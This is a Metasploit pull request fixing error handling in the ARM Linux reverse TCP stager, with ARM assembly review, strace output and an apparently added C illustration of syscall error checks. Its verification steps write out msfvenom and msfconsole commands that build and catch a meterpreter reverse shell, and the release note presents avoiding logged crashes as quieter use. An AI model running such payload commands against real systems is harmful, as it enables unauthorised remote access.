
Add error handling to ARM linux reverse tcp stager #8543

Merged (6 commits, Jun 18, 2017)

Conversation

@tkmru tkmru (Contributor) commented Jun 11, 2017

I added error handling to the ARM Linux reverse TCP stager, for: Linux reverse_tcp stager segfaults when it can't connect · Issue #7722 · rapid7/metasploit-framework.

Verification

List the steps needed to make sure this thing works

  • ./msfconsole -qx "use exploit/multi/handler; set payload linux/armle/meterpreter/reverse_tcp; set lhost IP_ADDR; set lport PORT_NUMBER; set ExitOnSession false; run -j"
  • follow commands
$ ./msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=6666 -f elf -o ./reverse_tcp
$ sudo chmod +x ./reverse_tcp
$ strace ./reverse_tcp 
execve("./reverse_tcp", ["./reverse_tcp"], [/* 14 vars */]) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(6666), sin_addr=inet_addr("192.168.0.1")}, 16) = -1 ETIMEDOUT (Connection timed out)
exit(1)                                 = ?

@timwr timwr (Contributor) commented Jun 12, 2017

It's possible I'm doing something stupid but this isn't opening a valid session for me anymore (with the handler started):

execve("./elf", ["./elf"], [/* 14 vars */]) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.0.1")}, 16) = 0
recv(3, "\210\0\0\0", 4, 0)             = 4
mmap2(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_EXECUTABLE, -1, 0) = 0xb6f0b000
exit(1)

It might also be worth updating the original assembly here:
https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/linux/armle/stager_sock_reverse.s

@tkmru tkmru (Contributor, Author) commented Jun 12, 2017

It's my mistake. Sorry. I'll fix it later.

0xe3a05000, # mov r5, #0
0xef000000, # svc 0x00000000 ; invoke mmap2
0xe3500000, # cmp r0, #0
0xba000012, # blt 817c <failed>
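Review bot: the blt on the last line of this snippet treats r0 as a signed value, so a successful mmap2 result with the top bit set (0xb6f0b000 in the strace output above) is classified as a failure and the stager exits. A raw Linux syscall signals failure by returning -errno, a word in the range [-4095, -1], so the check should be an unsigned compare of r0 against that range rather than a sign test; a beq on zero would not catch those -errno returns either.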
@busterb busterb (Member) commented Jun 14, 2017

Doesn't mmap return a pointer? You'd want a beq here I think, not a blt.
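The trace above and this review comment come down to one ABI detail. The C below is an added illustration, not code from this PR or from Metasploit: it compares the signed test that cmp/blt performs with the unsigned -errno range test the Linux syscall ABI defines, using the two return words quoted in this thread; the ARM encoding of the range check is not shown.

```c
#include <errno.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Linux raw-syscall ABI: on failure the syscall returns -errno, i.e. a word
 * in [-4095, -1] (0xFFFFF001..0xFFFFFFFF on 32-bit ARM).  Any other word is
 * a success, including mmap2 results with the top bit set such as the
 * 0xb6f0b000 in the strace output quoted in this thread. */
#define MAX_ERRNO 4095u

/* What "cmp r0, #0 ; blt failed" tests: the word as a signed 32-bit int. */
static bool blt_check_fails(uint32_t r0)
{
    return (int32_t)r0 < 0;
}

/* What libc syscall wrappers test: an unsigned compare against the
 * -errno range only. */
static bool errno_range_check_fails(uint32_t r0)
{
    return r0 >= (uint32_t)-MAX_ERRNO;   /* r0 >= 0xFFFFF001 */
}

/* Positive errno for a failed syscall word, 0 for a success. */
static int syscall_errno(uint32_t r0)
{
    return errno_range_check_fails(r0) ? -(int)(int32_t)r0 : 0;
}

int main(void)
{
    /* Constructed sample words: the mmap2 result and the connect error
     * (ETIMEDOUT) from the strace output in this thread, plus zero. */
    const uint32_t samples[] = { 0xb6f0b000u, (uint32_t)-ETIMEDOUT, 0u };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        uint32_t r0 = samples[i];
        printf("r0=0x%08x  blt:%s  errno-range:%s  errno=%d\n", r0,
               blt_check_fails(r0) ? "fail" : "ok",
               errno_range_check_fails(r0) ? "fail" : "ok",
               syscall_errno(r0));
    }
    return 0;
}
```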

@tkmru tkmru force-pushed the fix/linux_reverse_tcp_arm branch 2 times, most recently from a7498c9 to 93c4b3f, June 16, 2017 06:29
@timwr timwr merged commit 1773a5f into rapid7:master Jun 18, 2017
@timwr timwr (Contributor) commented Jun 18, 2017

Excellent work @tkmru many thanks 👍

@tkmru tkmru (Contributor, Author) commented Jun 19, 2017

@timwr many thanks for supporting me.

@alrosenthal-r7 alrosenthal-r7 commented Jun 28, 2017

Release Notes

This fix resolves inadequate error handling in the payloads/stagers/linux/armle/reverse_tcp module, which caused the module to crash. Every crash would be logged, so by avoiding crashes you can now use the module quietly.

@alrosenthal-r7 alrosenthal-r7 added the rn-fix release notes fix label Jun 28, 2017